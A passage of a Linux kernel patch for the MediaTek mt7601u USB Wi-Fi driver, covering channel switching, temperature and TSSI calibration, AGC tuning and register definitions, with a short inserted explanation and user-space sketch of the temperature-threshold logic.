NL80211_CHAN_HT40PLUS) + chan_idx += 2; + else + dev_err(dev->dev, "Error: invalid 40MHz channel!!\n"); + } + + if (bw != dev->bw || chan_ext_below != dev->chan_ext_below) { + dev_dbg(dev->dev, "Info: switching HT mode bw:%d below:%d\n", + bw, chan_ext_below); + + mt7601u_bbp_set_bw(dev, bw); + + mt7601u_bbp_set_ctrlch(dev, chan_ext_below); + mt7601u_mac_set_ctrlch(dev, chan_ext_below); + dev->chan_ext_below = chan_ext_below; + } + + for (i = 0; i < FREQ_PLAN_REGS; i++) + channel_freq_plan[i].value = freq_plan[chan_idx][i]; + + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_RF, + channel_freq_plan, FREQ_PLAN_REGS); + if (ret) + return ret; + + mt7601u_rmw(dev, MT_TX_ALC_CFG_0, 0x3f3f, + dev->ee->chan_pwr[chan_idx] & 0x3f); + + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, + bbp_settings, ARRAY_SIZE(bbp_settings)); + if (ret) + return ret; + + mt7601u_vco_cal(dev); + mt7601u_bbp_set_bw(dev, bw); + ret = mt7601u_set_bw_filter(dev, false); + if (ret) + return ret; + + mt7601u_apply_ch14_fixup(dev, chan->hw_value); + mt7601u_wr(dev, MT_TX_PWR_CFG_0, int_to_s6(t->ofdm[1].bw20) << 24 | + int_to_s6(t->ofdm[0].bw20) << 16 | + int_to_s6(t->cck[1].bw20) << 8 | + int_to_s6(t->cck[0].bw20)); + + if (test_bit(MT7601U_STATE_SCANNING, &dev->state)) + mt7601u_agc_reset(dev); + + dev->chandef = *chandef; + + return 0; +} + +int mt7601u_phy_set_channel(struct mt7601u_dev *dev, + struct cfg80211_chan_def *chandef) +{ + int ret; + + cancel_delayed_work_sync(&dev->cal_work); + cancel_delayed_work_sync(&dev->freq_cal.work); + + mutex_lock(&dev->hw_atomic_mutex); + ret = __mt7601u_phy_set_channel(dev, chandef); + mutex_unlock(&dev->hw_atomic_mutex); + if (ret) + return ret; + + if (test_bit(MT7601U_STATE_SCANNING, &dev->state)) + return 0; + + ieee80211_queue_delayed_work(dev->hw, &dev->cal_work, + MT_CALIBRATE_INTERVAL); + if (dev->freq_cal.enabled) + ieee80211_queue_delayed_work(dev->hw, &dev->freq_cal.work, + MT_FREQ_CAL_INIT_DELAY); + return 0; +} + +#define BBP_R47_FLAG GENMASK(2, 0) +#define BBP_R47_F_TSSI 0 +#define BBP_R47_F_PKT_T 1 +#define BBP_R47_F_TX_RATE 2 +#define BBP_R47_F_TEMP 4 +/** + * mt7601u_bbp_r47_get - read value through BBP R47/R49 pair + * @dev: pointer to adapter structure + * @reg: value of BBP R47 before the operation + * @flag: one of the BBP_R47_F_* flags + * + * Convenience helper for reading values through BBP R47/R49 pair. + * Takes old value of BBP R47 as @reg, because callers usually have it + * cached already. + * + * Return: value of BBP R49. 
+ */ +static u8 mt7601u_bbp_r47_get(struct mt7601u_dev *dev, u8 reg, u8 flag) +{ + flag |= reg & ~BBP_R47_FLAG; + mt7601u_bbp_wr(dev, 47, flag); + usleep_range(500, 700); + return mt7601u_bbp_rr(dev, 49); +} + +static s8 mt7601u_read_bootup_temp(struct mt7601u_dev *dev) +{ + u8 bbp_val, temp; + u32 rf_bp, rf_set; + int i; + + rf_set = mt7601u_rr(dev, MT_RF_SETTING_0); + rf_bp = mt7601u_rr(dev, MT_RF_BYPASS_0); + + mt7601u_wr(dev, MT_RF_BYPASS_0, 0); + mt7601u_wr(dev, MT_RF_SETTING_0, 0x00000010); + mt7601u_wr(dev, MT_RF_BYPASS_0, 0x00000010); + + bbp_val = mt7601u_bbp_rmw(dev, 47, 0, 0x10); + + mt7601u_bbp_wr(dev, 22, 0x40); + + for (i = 100; i && (bbp_val & 0x10); i--) + bbp_val = mt7601u_bbp_rr(dev, 47); + + temp = mt7601u_bbp_r47_get(dev, bbp_val, BBP_R47_F_TEMP); + + mt7601u_bbp_wr(dev, 22, 0); + + bbp_val = mt7601u_bbp_rr(dev, 21); + bbp_val |= 0x02; + mt7601u_bbp_wr(dev, 21, bbp_val); + bbp_val &= ~0x02; + mt7601u_bbp_wr(dev, 21, bbp_val); + + mt7601u_wr(dev, MT_RF_BYPASS_0, 0); + mt7601u_wr(dev, MT_RF_SETTING_0, rf_set); + mt7601u_wr(dev, MT_RF_BYPASS_0, rf_bp); + + trace_read_temp(dev, temp); + return temp; +} + +static s8 mt7601u_read_temp(struct mt7601u_dev *dev) +{ + int i; + u8 val; + s8 temp; + + val = mt7601u_bbp_rmw(dev, 47, 0x7f, 0x10); + + /* Note: this rarely succeeds, temp can change even if it fails. */ + for (i = 100; i && (val & 0x10); i--) + val = mt7601u_bbp_rr(dev, 47); + + temp = mt7601u_bbp_r47_get(dev, val, BBP_R47_F_TEMP); + + trace_read_temp(dev, temp); + return temp; +} + +static void mt7601u_rxdc_cal(struct mt7601u_dev *dev) +{ + static const struct mt76_reg_pair intro[] = { + { 158, 0x8d }, { 159, 0xfc }, + { 158, 0x8c }, { 159, 0x4c }, + }, outro[] = { + { 158, 0x8d }, { 159, 0xe0 }, + }; + u32 mac_ctrl; + int i, ret; + + mac_ctrl = mt7601u_rr(dev, MT_MAC_SYS_CTRL); + mt7601u_wr(dev, MT_MAC_SYS_CTRL, MT_MAC_SYS_CTRL_ENABLE_RX); + + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, + intro, ARRAY_SIZE(intro)); + if (ret) + dev_err(dev->dev, "%s intro failed:%d\n", __func__, ret); + + for (i = 20; i; i--) { + usleep_range(300, 500); + + mt7601u_bbp_wr(dev, 158, 0x8c); + if (mt7601u_bbp_rr(dev, 159) == 0x0c) + break; + } + if (!i) + dev_err(dev->dev, "%s timed out\n", __func__); + + mt7601u_wr(dev, MT_MAC_SYS_CTRL, 0); + + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, + outro, ARRAY_SIZE(outro)); + if (ret) + dev_err(dev->dev, "%s outro failed:%d\n", __func__, ret); + + mt7601u_wr(dev, MT_MAC_SYS_CTRL, mac_ctrl); +} + +void mt7601u_phy_recalibrate_after_assoc(struct mt7601u_dev *dev) +{ + mt7601u_mcu_calibrate(dev, MCU_CAL_DPD, dev->curr_temp); + + mt7601u_rxdc_cal(dev); +} + +/* Note: function copied from vendor driver */ +static s16 lin2dBd(u16 linear) +{ + short exp = 0; + unsigned int mantisa; + int app, dBd; + + if (WARN_ON(!linear)) + return -10000; + + mantisa = linear; + + exp = fls(mantisa) - 16; + if (exp > 0) + mantisa >>= exp; + else + mantisa <<= abs(exp); + + if (mantisa <= 0xb800) + app = (mantisa + (mantisa >> 3) + (mantisa >> 4) - 0x9600); + else + app = (mantisa - (mantisa >> 3) - (mantisa >> 6) - 0x5a00); + if (app < 0) + app = 0; + + dBd = ((15 + exp) << 15) + app; + dBd = (dBd << 2) + (dBd << 1) + (dBd >> 6) + (dBd >> 7); + dBd = (dBd >> 10); + + return dBd; +} + +static void +mt7601u_set_initial_tssi(struct mt7601u_dev *dev, s16 tssi_db, s16 tssi_hvga_db) +{ + struct tssi_data *d = &dev->ee->tssi_data; + int init_offset; + + init_offset = -((tssi_db * d->slope + d->offset[1]) / 4096) + 10; + + mt76_rmw(dev, MT_TX_ALC_CFG_1, 
MT_TX_ALC_CFG_1_TEMP_COMP, + int_to_s6(init_offset) & MT_TX_ALC_CFG_1_TEMP_COMP); +} + +static void mt7601u_tssi_dc_gain_cal(struct mt7601u_dev *dev) +{ + u8 rf_vga, rf_mixer, bbp_r47; + int i, j; + s8 res[4]; + s16 tssi_init_db, tssi_init_hvga_db; + + mt7601u_wr(dev, MT_RF_SETTING_0, 0x00000030); + mt7601u_wr(dev, MT_RF_BYPASS_0, 0x000c0030); + mt7601u_wr(dev, MT_MAC_SYS_CTRL, 0); + + mt7601u_bbp_wr(dev, 58, 0); + mt7601u_bbp_wr(dev, 241, 0x2); + mt7601u_bbp_wr(dev, 23, 0x8); + bbp_r47 = mt7601u_bbp_rr(dev, 47); + + /* Set VGA gain */ + rf_vga = mt7601u_rf_rr(dev, 5, 3); + mt7601u_rf_wr(dev, 5, 3, 8); + + /* Mixer disable */ + rf_mixer = mt7601u_rf_rr(dev, 4, 39); + mt7601u_rf_wr(dev, 4, 39, 0); + + for (i = 0; i < 4; i++) { + mt7601u_rf_wr(dev, 4, 39, (i & 1) ? rf_mixer : 0); + + mt7601u_bbp_wr(dev, 23, (i < 2) ? 0x08 : 0x02); + mt7601u_rf_wr(dev, 5, 3, (i < 2) ? 0x08 : 0x11); + + /* BBP TSSI initial and soft reset */ + mt7601u_bbp_wr(dev, 22, 0); + mt7601u_bbp_wr(dev, 244, 0); + + mt7601u_bbp_wr(dev, 21, 1); + udelay(1); + mt7601u_bbp_wr(dev, 21, 0); + + /* TSSI measurement */ + mt7601u_bbp_wr(dev, 47, 0x50); + mt7601u_bbp_wr(dev, (i & 1) ? 244 : 22, (i & 1) ? 0x31 : 0x40); + + for (j = 20; j; j--) + if (!(mt7601u_bbp_rr(dev, 47) & 0x10)) + break; + if (!j) + dev_err(dev->dev, "%s timed out\n", __func__); + + /* TSSI read */ + mt7601u_bbp_wr(dev, 47, 0x40); + res[i] = mt7601u_bbp_rr(dev, 49); + } + + tssi_init_db = lin2dBd((short)res[1] - res[0]); + tssi_init_hvga_db = lin2dBd(((short)res[3] - res[2]) * 4); + dev->tssi_init = res[0]; + dev->tssi_init_hvga = res[2]; + dev->tssi_init_hvga_offset_db = tssi_init_hvga_db - tssi_init_db; + + dev_dbg(dev->dev, + "TSSI_init:%hhx db:%hx hvga:%hhx hvga_db:%hx off_db:%hx\n", + dev->tssi_init, tssi_init_db, dev->tssi_init_hvga, + tssi_init_hvga_db, dev->tssi_init_hvga_offset_db); + + mt7601u_bbp_wr(dev, 22, 0); + mt7601u_bbp_wr(dev, 244, 0); + + mt7601u_bbp_wr(dev, 21, 1); + udelay(1); + mt7601u_bbp_wr(dev, 21, 0); + + mt7601u_wr(dev, MT_RF_BYPASS_0, 0); + mt7601u_wr(dev, MT_RF_SETTING_0, 0); + + mt7601u_rf_wr(dev, 5, 3, rf_vga); + mt7601u_rf_wr(dev, 4, 39, rf_mixer); + mt7601u_bbp_wr(dev, 47, bbp_r47); + + mt7601u_set_initial_tssi(dev, tssi_init_db, tssi_init_hvga_db); +} + +static int mt7601u_temp_comp(struct mt7601u_dev *dev, bool on) +{ + int ret, temp, hi_temp = 400, lo_temp = -200; + + temp = (dev->raw_temp - dev->ee->ref_temp) * MT_EE_TEMPERATURE_SLOPE; + dev->curr_temp = temp; + + /* DPD Calibration */ + if (temp - dev->dpd_temp > 450 || temp - dev->dpd_temp < -450) { + dev->dpd_temp = temp; + + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_DPD, dev->dpd_temp); + if (ret) + return ret; + + mt7601u_vco_cal(dev); + + dev_dbg(dev->dev, "Recalibrate DPD\n"); + } + + /* PLL Lock Protect */ + if (temp < -50 && !dev->pll_lock_protect) { /* < 20C */ + dev->pll_lock_protect = true; + + mt7601u_rf_wr(dev, 4, 4, 6); + mt7601u_rf_clear(dev, 4, 10, 0x30); + + dev_dbg(dev->dev, "PLL lock protect on - too cold\n"); + } else if (temp > 50 && dev->pll_lock_protect) { /* > 30C */ + dev->pll_lock_protect = false; + + mt7601u_rf_wr(dev, 4, 4, 0); + mt7601u_rf_rmw(dev, 4, 10, 0x30, 0x10); + + dev_dbg(dev->dev, "PLL lock protect off\n"); + } + + if (on) { + hi_temp -= 50; + lo_temp -= 50; + } + + /* BBP CR for H, L, N temperature */ + if (temp > hi_temp) + return mt7601u_bbp_temp(dev, MT_TEMP_MODE_HIGH, "high"); + else if (temp > lo_temp) + return mt7601u_bbp_temp(dev, MT_TEMP_MODE_NORMAL, "normal"); + else + return mt7601u_bbp_temp(dev, MT_TEMP_MODE_LOW, "low"); +} 
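
For reference, the temperature handling in mt7601u_temp_comp() above boils down to: derive an internal temperature as (raw_temp - ref_temp) * MT_EE_TEMPERATURE_SLOPE, recalibrate DPD when it drifts more than 450 units from the last DPD temperature, toggle PLL lock protection around the -50/+50 marks, and pick one of three BBP register tables using the 400/-200 thresholds (lowered by 50 once compensation is already running). A minimal user-space sketch of just the table-selection step, reusing those constants, is shown below; pick_bbp_table() and its enum are illustrative only and not part of the driver.

#include <stdbool.h>
#include <stdio.h>

enum temp_mode { TEMP_MODE_NORMAL, TEMP_MODE_HIGH, TEMP_MODE_LOW };

/* Same slope the driver uses (MT_EE_TEMPERATURE_SLOPE). */
#define TEMPERATURE_SLOPE	39

/* Illustrative stand-in for the threshold logic in mt7601u_temp_comp(). */
static enum temp_mode pick_bbp_table(int raw_temp, int ref_temp, bool on)
{
	int temp = (raw_temp - ref_temp) * TEMPERATURE_SLOPE;
	int hi_temp = 400, lo_temp = -200;

	if (on) {
		/* Running compensation shifts both thresholds down by 50. */
		hi_temp -= 50;
		lo_temp -= 50;
	}

	if (temp > hi_temp)
		return TEMP_MODE_HIGH;
	if (temp > lo_temp)
		return TEMP_MODE_NORMAL;
	return TEMP_MODE_LOW;
}

int main(void)
{
	/* (60 - 50) * 39 = 390 > 350, so the "high" table is selected. */
	printf("mode: %d\n", pick_bbp_table(60, 50, true));
	return 0;
}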
+ +/* Note: this is used only with TSSI, we can just use trgt_pwr from eeprom. */ +static int mt7601u_current_tx_power(struct mt7601u_dev *dev) +{ + return dev->ee->chan_pwr[dev->chandef.chan->hw_value - 1]; +} + +static bool mt7601u_use_hvga(struct mt7601u_dev *dev) +{ + return !(mt7601u_current_tx_power(dev) > 20); +} + +static s16 +mt7601u_phy_rf_pa_mode_val(struct mt7601u_dev *dev, int phy_mode, int tx_rate) +{ + static const s16 decode_tb[] = { 0, 8847, -5734, -5734 }; + u32 reg; + + switch (phy_mode) { + case MT_PHY_TYPE_OFDM: + tx_rate += 4; + case MT_PHY_TYPE_CCK: + reg = dev->rf_pa_mode[0]; + break; + default: + reg = dev->rf_pa_mode[1]; + break; + } + + return decode_tb[(reg >> (tx_rate * 2)) & 0x3]; +} + +static struct mt7601u_tssi_params +mt7601u_tssi_params_get(struct mt7601u_dev *dev) +{ + static const u8 ofdm_pkt2rate[8] = { 6, 4, 2, 0, 7, 5, 3, 1 }; + static const int static_power[4] = { 0, -49152, -98304, 49152 }; + struct mt7601u_tssi_params p; + u8 bbp_r47, pkt_type, tx_rate; + struct power_per_rate *rate_table; + + bbp_r47 = mt7601u_bbp_rr(dev, 47); + + p.tssi0 = mt7601u_bbp_r47_get(dev, bbp_r47, BBP_R47_F_TSSI); + dev->raw_temp = mt7601u_bbp_r47_get(dev, bbp_r47, BBP_R47_F_TEMP); + pkt_type = mt7601u_bbp_r47_get(dev, bbp_r47, BBP_R47_F_PKT_T); + + p.trgt_power = mt7601u_current_tx_power(dev); + + switch (pkt_type & 0x03) { + case MT_PHY_TYPE_CCK: + tx_rate = (pkt_type >> 4) & 0x03; + rate_table = dev->ee->power_rate_table.cck; + break; + + case MT_PHY_TYPE_OFDM: + tx_rate = ofdm_pkt2rate[(pkt_type >> 4) & 0x07]; + rate_table = dev->ee->power_rate_table.ofdm; + break; + + default: + tx_rate = mt7601u_bbp_r47_get(dev, bbp_r47, BBP_R47_F_TX_RATE); + tx_rate &= 0x7f; + rate_table = dev->ee->power_rate_table.ht; + break; + } + + if (dev->bw == MT_BW_20) + p.trgt_power += rate_table[tx_rate / 2].bw20; + else + p.trgt_power += rate_table[tx_rate / 2].bw40; + + p.trgt_power <<= 12; + + dev_dbg(dev->dev, "tx_rate:%02hhx pwr:%08x\n", tx_rate, p.trgt_power); + + p.trgt_power += mt7601u_phy_rf_pa_mode_val(dev, pkt_type & 0x03, + tx_rate); + + /* Channel 14, cck, bw20 */ + if ((pkt_type & 0x03) == MT_PHY_TYPE_CCK) { + if (mt7601u_bbp_rr(dev, 4) & 0x20) + p.trgt_power += mt7601u_bbp_rr(dev, 178) ? 18022 : 9830; + else + p.trgt_power += mt7601u_bbp_rr(dev, 178) ? 819 : 24576; + } + + p.trgt_power += static_power[mt7601u_bbp_rr(dev, 1) & 0x03]; + + p.trgt_power += dev->ee->tssi_data.tx0_delta_offset; + + dev_dbg(dev->dev, + "tssi:%02hhx t_power:%08x temp:%02hhx pkt_type:%02hhx\n", + p.tssi0, p.trgt_power, dev->raw_temp, pkt_type); + + return p; +} + +static bool mt7601u_tssi_read_ready(struct mt7601u_dev *dev) +{ + return !(mt7601u_bbp_rr(dev, 47) & 0x10); +} + +static int mt7601u_tssi_cal(struct mt7601u_dev *dev) +{ + struct mt7601u_tssi_params params; + int curr_pwr, diff_pwr; + char tssi_offset; + s8 tssi_init; + s16 tssi_m_dc, tssi_db; + bool hvga; + u32 val; + + if (!dev->ee->tssi_enabled) + return 0; + + hvga = mt7601u_use_hvga(dev); + if (!dev->tssi_read_trig) + return mt7601u_mcu_tssi_read_kick(dev, hvga); + + if (!mt7601u_tssi_read_ready(dev)) + return 0; + + params = mt7601u_tssi_params_get(dev); + + tssi_init = (hvga ? 
dev->tssi_init_hvga : dev->tssi_init); + tssi_m_dc = params.tssi0 - tssi_init; + tssi_db = lin2dBd(tssi_m_dc); + dev_dbg(dev->dev, "tssi dc:%04hx db:%04hx hvga:%d\n", + tssi_m_dc, tssi_db, hvga); + + if (dev->chandef.chan->hw_value < 5) + tssi_offset = dev->ee->tssi_data.offset[0]; + else if (dev->chandef.chan->hw_value < 9) + tssi_offset = dev->ee->tssi_data.offset[1]; + else + tssi_offset = dev->ee->tssi_data.offset[2]; + + if (hvga) + tssi_db -= dev->tssi_init_hvga_offset_db; + + curr_pwr = tssi_db * dev->ee->tssi_data.slope + (tssi_offset << 9); + diff_pwr = params.trgt_power - curr_pwr; + dev_dbg(dev->dev, "Power curr:%08x diff:%08x\n", curr_pwr, diff_pwr); + + if (params.tssi0 > 126 && diff_pwr > 0) { + dev_err(dev->dev, "Error: TSSI upper saturation\n"); + diff_pwr = 0; + } + if (params.tssi0 - tssi_init < 1 && diff_pwr < 0) { + dev_err(dev->dev, "Error: TSSI lower saturation\n"); + diff_pwr = 0; + } + + if ((dev->prev_pwr_diff ^ diff_pwr) < 0 && abs(diff_pwr) < 4096 && + (abs(diff_pwr) > abs(dev->prev_pwr_diff) || + (diff_pwr > 0 && diff_pwr == -dev->prev_pwr_diff))) + diff_pwr = 0; + else + dev->prev_pwr_diff = diff_pwr; + + diff_pwr += (diff_pwr > 0) ? 2048 : -2048; + diff_pwr /= 4096; + + dev_dbg(dev->dev, "final diff: %08x\n", diff_pwr); + + val = mt7601u_rr(dev, MT_TX_ALC_CFG_1); + curr_pwr = s6_to_int(MT76_GET(MT_TX_ALC_CFG_1_TEMP_COMP, val)); + diff_pwr += curr_pwr; + val = (val & ~MT_TX_ALC_CFG_1_TEMP_COMP) | int_to_s6(diff_pwr); + mt7601u_wr(dev, MT_TX_ALC_CFG_1, val); + + return mt7601u_mcu_tssi_read_kick(dev, hvga); +} + +static u8 mt7601u_agc_default(struct mt7601u_dev *dev) +{ + return (dev->ee->lna_gain - 8) * 2 + 0x34; +} + +static void mt7601u_agc_reset(struct mt7601u_dev *dev) +{ + u8 agc = mt7601u_agc_default(dev); + + mt7601u_bbp_wr(dev, 66, agc); +} + +void mt7601u_agc_save(struct mt7601u_dev *dev) +{ + dev->agc_save = mt7601u_bbp_rr(dev, 66); +} + +void mt7601u_agc_restore(struct mt7601u_dev *dev) +{ + mt7601u_bbp_wr(dev, 66, dev->agc_save); +} + +static void mt7601u_agc_tune(struct mt7601u_dev *dev) +{ + u8 val = mt7601u_agc_default(dev); + + if (test_bit(MT7601U_STATE_SCANNING, &dev->state)) + return; + + /* Note: only in STA mode and not dozing; perhaps do this only if + * there is enough rssi updates since last run? + * Rssi updates are only on beacons and U2M so should work... + */ + spin_lock_bh(&dev->con_mon_lock); + if (dev->avg_rssi <= -70) + val -= 0x20; + else if (dev->avg_rssi <= -60) + val -= 0x10; + spin_unlock_bh(&dev->con_mon_lock); + + if (val != mt7601u_bbp_rr(dev, 66)) + mt7601u_bbp_wr(dev, 66, val); + + /* TODO: also if lost a lot of beacons try resetting + * (see RTMPSetAGCInitValue() call in mlme.c). + */ +} + +static void mt7601u_phy_calibrate(struct work_struct *work) +{ + struct mt7601u_dev *dev = container_of(work, struct mt7601u_dev, + cal_work.work); + + mt7601u_agc_tune(dev); + mt7601u_tssi_cal(dev); + /* If TSSI calibration was run it already updated temperature. 
*/ + if (!dev->ee->tssi_enabled) + dev->raw_temp = mt7601u_read_temp(dev); + mt7601u_temp_comp(dev, true); /* TODO: find right value for @on */ + + ieee80211_queue_delayed_work(dev->hw, &dev->cal_work, + MT_CALIBRATE_INTERVAL); +} + +static unsigned long +__mt7601u_phy_freq_cal(struct mt7601u_dev *dev, s8 last_offset, u8 phy_mode) +{ + u8 activate_threshold, deactivate_threshold; + + trace_freq_cal_offset(dev, phy_mode, last_offset); + + /* No beacons received - reschedule soon */ + if (last_offset == MT_FREQ_OFFSET_INVALID) + return MT_FREQ_CAL_ADJ_INTERVAL; + + switch (phy_mode) { + case MT_PHY_TYPE_CCK: + activate_threshold = 19; + deactivate_threshold = 5; + break; + case MT_PHY_TYPE_OFDM: + activate_threshold = 102; + deactivate_threshold = 32; + break; + case MT_PHY_TYPE_HT: + case MT_PHY_TYPE_HT_GF: + activate_threshold = 82; + deactivate_threshold = 20; + break; + default: + WARN_ON(1); + return MT_FREQ_CAL_CHECK_INTERVAL; + } + + if (abs(last_offset) >= activate_threshold) + dev->freq_cal.adjusting = true; + else if (abs(last_offset) <= deactivate_threshold) + dev->freq_cal.adjusting = false; + + if (!dev->freq_cal.adjusting) + return MT_FREQ_CAL_CHECK_INTERVAL; + + if (last_offset > deactivate_threshold) { + if (dev->freq_cal.freq > 0) + dev->freq_cal.freq--; + else + dev->freq_cal.adjusting = false; + } else if (last_offset < -deactivate_threshold) { + if (dev->freq_cal.freq < 0xbf) + dev->freq_cal.freq++; + else + dev->freq_cal.adjusting = false; + } + + trace_freq_cal_adjust(dev, dev->freq_cal.freq); + mt7601u_rf_wr(dev, 0, 12, dev->freq_cal.freq); + mt7601u_vco_cal(dev); + + return dev->freq_cal.adjusting ? MT_FREQ_CAL_ADJ_INTERVAL : + MT_FREQ_CAL_CHECK_INTERVAL; +} + +static void mt7601u_phy_freq_cal(struct work_struct *work) +{ + struct mt7601u_dev *dev = container_of(work, struct mt7601u_dev, + freq_cal.work.work); + s8 last_offset; + u8 phy_mode; + unsigned long delay; + + spin_lock_bh(&dev->con_mon_lock); + last_offset = dev->bcn_freq_off; + phy_mode = dev->bcn_phy_mode; + spin_unlock_bh(&dev->con_mon_lock); + + delay = __mt7601u_phy_freq_cal(dev, last_offset, phy_mode); + ieee80211_queue_delayed_work(dev->hw, &dev->freq_cal.work, delay); + + spin_lock_bh(&dev->con_mon_lock); + dev->bcn_freq_off = MT_FREQ_OFFSET_INVALID; + spin_unlock_bh(&dev->con_mon_lock); +} + +void mt7601u_phy_con_cal_onoff(struct mt7601u_dev *dev, + struct ieee80211_bss_conf *info) +{ + if (!info->assoc) + cancel_delayed_work_sync(&dev->freq_cal.work); + + /* Start/stop collecting beacon data */ + spin_lock_bh(&dev->con_mon_lock); + ether_addr_copy(dev->ap_bssid, info->bssid); + dev->avg_rssi = 0; + dev->bcn_freq_off = MT_FREQ_OFFSET_INVALID; + spin_unlock_bh(&dev->con_mon_lock); + + dev->freq_cal.freq = dev->ee->rf_freq_off; + dev->freq_cal.enabled = info->assoc; + dev->freq_cal.adjusting = false; + + if (info->assoc) + ieee80211_queue_delayed_work(dev->hw, &dev->freq_cal.work, + MT_FREQ_CAL_INIT_DELAY); +} + +static int mt7601u_init_cal(struct mt7601u_dev *dev) +{ + u32 mac_ctrl; + int ret; + + dev->raw_temp = mt7601u_read_bootup_temp(dev); + dev->curr_temp = (dev->raw_temp - dev->ee->ref_temp) * + MT_EE_TEMPERATURE_SLOPE; + dev->dpd_temp = dev->curr_temp; + + mac_ctrl = mt7601u_rr(dev, MT_MAC_SYS_CTRL); + + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_R, 0); + if (ret) + return ret; + + ret = mt7601u_rf_rr(dev, 0, 4); + if (ret < 0) + return ret; + ret |= 0x80; + ret = mt7601u_rf_wr(dev, 0, 4, ret); + if (ret) + return ret; + msleep(2); + + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_TXDCOC, 0); + if 
(ret) + return ret; + + mt7601u_rxdc_cal(dev); + + ret = mt7601u_set_bw_filter(dev, true); + if (ret) + return ret; + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_LOFT, 0); + if (ret) + return ret; + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_TXIQ, 0); + if (ret) + return ret; + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_RXIQ, 0); + if (ret) + return ret; + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_DPD, dev->dpd_temp); + if (ret) + return ret; + + mt7601u_rxdc_cal(dev); + + mt7601u_tssi_dc_gain_cal(dev); + + mt7601u_wr(dev, MT_MAC_SYS_CTRL, mac_ctrl); + + mt7601u_temp_comp(dev, true); + + return 0; +} + +int mt7601u_bbp_set_bw(struct mt7601u_dev *dev, int bw) +{ + u32 val, old; + + if (bw == dev->bw) { + /* Vendor driver does the rmc even when no change is needed. */ + mt7601u_bbp_rmc(dev, 4, 0x18, bw == MT_BW_20 ? 0 : 0x10); + + return 0; + } + dev->bw = bw; + + /* Stop MAC for the time of bw change */ + old = mt7601u_rr(dev, MT_MAC_SYS_CTRL); + val = old & ~(MT_MAC_SYS_CTRL_ENABLE_TX | MT_MAC_SYS_CTRL_ENABLE_RX); + mt7601u_wr(dev, MT_MAC_SYS_CTRL, val); + mt76_poll(dev, MT_MAC_STATUS, MT_MAC_STATUS_TX | MT_MAC_STATUS_RX, + 0, 500000); + + mt7601u_bbp_rmc(dev, 4, 0x18, bw == MT_BW_20 ? 0 : 0x10); + + mt7601u_wr(dev, MT_MAC_SYS_CTRL, old); + + return mt7601u_load_bbp_temp_table_bw(dev); +} + +/** + * mt7601u_set_rx_path - set rx path in BBP + * @dev: pointer to adapter structure + * @path: rx path to set values are 0-based + */ +void mt7601u_set_rx_path(struct mt7601u_dev *dev, u8 path) +{ + mt7601u_bbp_rmw(dev, 3, 0x18, path << 3); +} + +/** + * mt7601u_set_tx_dac - set which tx DAC to use + * @dev: pointer to adapter structure + * @path: DAC index, values are 0-based + */ +void mt7601u_set_tx_dac(struct mt7601u_dev *dev, u8 dac) +{ + mt7601u_bbp_rmc(dev, 1, 0x18, dac << 3); +} + +int mt7601u_phy_init(struct mt7601u_dev *dev) +{ + int ret; + + dev->rf_pa_mode[0] = mt7601u_rr(dev, MT_RF_PA_MODE_CFG0); + dev->rf_pa_mode[1] = mt7601u_rr(dev, MT_RF_PA_MODE_CFG1); + + ret = mt7601u_rf_wr(dev, 0, 12, dev->ee->rf_freq_off); + if (ret) + return ret; + ret = mt7601u_write_reg_pairs(dev, 0, rf_central, + ARRAY_SIZE(rf_central)); + if (ret) + return ret; + ret = mt7601u_write_reg_pairs(dev, 0, rf_channel, + ARRAY_SIZE(rf_channel)); + if (ret) + return ret; + ret = mt7601u_write_reg_pairs(dev, 0, rf_vga, ARRAY_SIZE(rf_vga)); + if (ret) + return ret; + + ret = mt7601u_init_cal(dev); + if (ret) + return ret; + + dev->prev_pwr_diff = 100; + + INIT_DELAYED_WORK(&dev->cal_work, mt7601u_phy_calibrate); + INIT_DELAYED_WORK(&dev->freq_cal.work, mt7601u_phy_freq_cal); + + return 0; +} diff --git a/drivers/net/wireless/mediatek/mt7601u/regs.h b/drivers/net/wireless/mediatek/mt7601u/regs.h new file mode 100644 index 000000000000..afd8978e83fa --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/regs.h @@ -0,0 +1,636 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ */ + +#ifndef __MT76_REGS_H +#define __MT76_REGS_H + +#include + +#ifndef GENMASK +#define GENMASK(h, l) (((U32_C(1) << ((h) - (l) + 1)) - 1) << (l)) +#endif + +#define MT_ASIC_VERSION 0x0000 + +#define MT76XX_REV_E3 0x22 +#define MT76XX_REV_E4 0x33 + +#define MT_CMB_CTRL 0x0020 +#define MT_CMB_CTRL_XTAL_RDY BIT(22) +#define MT_CMB_CTRL_PLL_LD BIT(23) + +#define MT_EFUSE_CTRL 0x0024 +#define MT_EFUSE_CTRL_AOUT GENMASK(5, 0) +#define MT_EFUSE_CTRL_MODE GENMASK(7, 6) +#define MT_EFUSE_CTRL_LDO_OFF_TIME GENMASK(13, 8) +#define MT_EFUSE_CTRL_LDO_ON_TIME GENMASK(15, 14) +#define MT_EFUSE_CTRL_AIN GENMASK(25, 16) +#define MT_EFUSE_CTRL_KICK BIT(30) +#define MT_EFUSE_CTRL_SEL BIT(31) + +#define MT_EFUSE_DATA_BASE 0x0028 +#define MT_EFUSE_DATA(_n) (MT_EFUSE_DATA_BASE + ((_n) << 2)) + +#define MT_COEXCFG0 0x0040 +#define MT_COEXCFG0_COEX_EN BIT(0) + +#define MT_WLAN_FUN_CTRL 0x0080 +#define MT_WLAN_FUN_CTRL_WLAN_EN BIT(0) +#define MT_WLAN_FUN_CTRL_WLAN_CLK_EN BIT(1) +#define MT_WLAN_FUN_CTRL_WLAN_RESET_RF BIT(2) + 